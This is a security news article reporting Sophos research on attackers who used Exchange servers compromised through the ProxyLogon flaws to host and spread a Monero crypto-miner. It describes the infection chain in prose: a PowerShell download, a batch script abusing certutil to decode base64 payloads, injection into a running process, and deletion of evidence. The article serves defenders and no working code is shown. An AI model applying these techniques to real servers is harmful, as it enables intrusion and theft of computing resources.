Crypto-jacking can be added to the list of threats that face any unpatched Exchange servers that remain vulnerable to the now-infamous Proxy Logon exploit, new research has discovered.
Threat players targeted compromised Exchange servers to host malicious Monero Crypto-miner in an “unusual attack,” Sophos researchers discovered.
Researchers discovered the threat players using Exchange servers compromised using the highly publicised exploit chain—which suffered a surge of attacks from advanced persistent threat (APT) groups to infect systems with everything from ransomware to web-shells—to host Monero crypto-mining malware, according to a report posted online this week by Sophos Labs.
Monero Crypto-Miner
“An unknown attacker has been attempting to use what’s now known as the Proxy Logon exploit to foist a malicious Monero crypto-miner onto Exchange servers, with the payload being hosted on a compromised Exchange server,” Sophos Principal Researcher Andrew Brandt wrote in the report.
Researchers were inspecting data when they discovered what they thought an “unusual attack” targeting the customer’s Exchange server. Sophos researchers Fraser Howard & Simon Porter were key in the discovery & analysis of the new threat, Brandt outlined.
Also revealed was that they detected the executables associated with this attack as Mal/Inject-GV & XMR-Stak Miner (PUA), states the report. Researchers published a list of indicators of compromise on the Sophos Labs GitHub page to help organisations recognise if they have been attacked in this way.
Working Method
The attack as seen by researchers began with a PowerShell command to retrieve a file named win_r.zip from another compromised server’s Outlook Web Access logon path (/owa/auth), outlines the report.
On closer examination, the .zip file was not a compressed archive at all but a batch script that then invoked the built-into-Windows certutil.exe program to download 2 additional files, win_s.zip & win_d.zip, which also were not compressed.
The 1st file is written out to the filesystem as QuickCPU.b64, an executable payload in base64 that can be decoded by the Certutil application, which by design can decode base64-encoded security certificates, researchers observed.
Batch Script
The batch script then runs another command that outputs the decoded executable into the same directory. When decoded, the batch script runs the executable, which extracts the miner & configuration data from the QuickCPU.dat file, injects it into a system process, & then deletes any evidence that it was there, according to the report.
The executable in the attack appears to contain a modified version of a tool publicly available on Github called PEx64-Injector, which is described on its Github page as having the ability to “migrate any x64 exe to any x64 process” with “no administrator privileges required,” according to the report.
Infected System
Once the file runs on an infected system, it extracts the contents of the QuickCPU.dat file, which includes an installer for the crypto-miner & its configuration temporarily to the filesystem. It then configures the miner, injects it into a running process, then quits, according to the report.
“The batch file then deletes the evidence & the miner remains running in memory, injected into a process already running on the system,” Brandt wrote.
Receiving Funds
Researchers observed the crypto-miner receiving funds on Mar. 9, which is when Microsoft also released updates to Exchange to patch the flaws.
Though the attacker lost several servers after this date & the output from the miner decreased, other servers that were gained thereafter more than made up for the early losses, according to the report.
Exploit-Chain History
The Proxy Logon problem started for Microsoft in early Mar. when the company explained that it had spotted multiple zero-day exploits in the wild being used to attack on-premises versions of Microsoft Exchange Server. The exploit chain is comprised of 4 flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065).
Put together the flaws created a pre-authentication remote code execution (RCE) exploit, meaning attackers can take over servers without knowing any valid account credentials. This gave them access to email communications & the opportunity to install a web shell for further exploitation within the environment.
Update
Microsoft released an out-of-band update soon after in its haste to patch the flaws in the Proxy Logon chain. However, while the company explained later that month that 92% of affected machines already had been patched, much damage had already been done, & unpatched systems likely exist that remain vulnerable.
https://www.cybernewsgroup.co.uk/virtual-conference-may-2021/
